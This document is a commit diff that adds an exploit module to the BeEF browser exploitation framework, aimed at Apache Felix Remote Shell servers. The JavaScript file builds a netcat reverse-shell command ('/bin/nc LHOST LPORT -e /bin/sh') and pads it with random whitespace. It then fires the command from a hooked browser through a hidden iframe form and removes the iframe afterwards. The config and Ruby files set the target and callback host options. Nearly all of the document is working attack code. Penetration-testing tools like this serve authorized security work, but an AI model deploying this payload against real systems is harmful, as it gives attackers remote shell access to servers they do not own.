Add Apache Felix Remote Shell module

modules/exploits/apache_felix_remote_shell/command.js

@@ -0,0 +1,51 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var payload_name = 'reverse_netcat';
+  var timeout = 15;
+  var peer = rhost + ':' + rport;
+
+  cleanup = function() {
+    try {
+      document.body.removeChild(felix_exec_iframe_<%= @command_id %>);
+    } catch(e) {
+      beef.debug("Could not remove iframe: " + e.message);
+    }
+  }
+  setTimeout("cleanup()", timeout*1000);
+
+  payload = function() {
+    var whitespace = '';
+    for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';
+    var payload = '';
+    switch (payload_name) {
+      default: // "reverse_netcat":
+        payload = 'exec "/bin/nc ' + lhost + ' ' + lport + ' -e /bin/sh" ';
+        payload = payload.replace(/ /g, whitespace);
+        break;
+    }
+    return payload
+  }
+
+  exploit = function() {
+    var code = payload();
+    beef.debug(peer + " - Sending payload (" + code.length + " bytes)");
+    var felix_exec_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code);
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+  }
+
+  try {
+    exploit();
+  } catch(e) {
+    beef.debug(peer + " - Exploit failed: " + e.message);
+  }
+
+});

modules/exploits/apache_felix_remote_shell/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        apache_felix_remote_shell:
+            enable: true
+            category: "Exploits"
+            name: "Apache Felix Remote Shell (Reverse Shell)"
+            description: "This module attempts to get a reverse shell on an Apache Felix Remote Shell server using the 'exec' command. The org.eclipse.osgi and org.eclipse.equinox.console bundles must be installed and active."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/apache_felix_remote_shell/module.rb

@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_felix_remote_shell < BeEF::Core::Command
+  
+  def self.options
+    configuration = BeEF::Core::Configuration.instance
+    lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+    lhost = "" if lhost == "0.0.0.0"
+    return [
+      { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, 
+      { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '6666' },
+      { 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost },
+      { 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end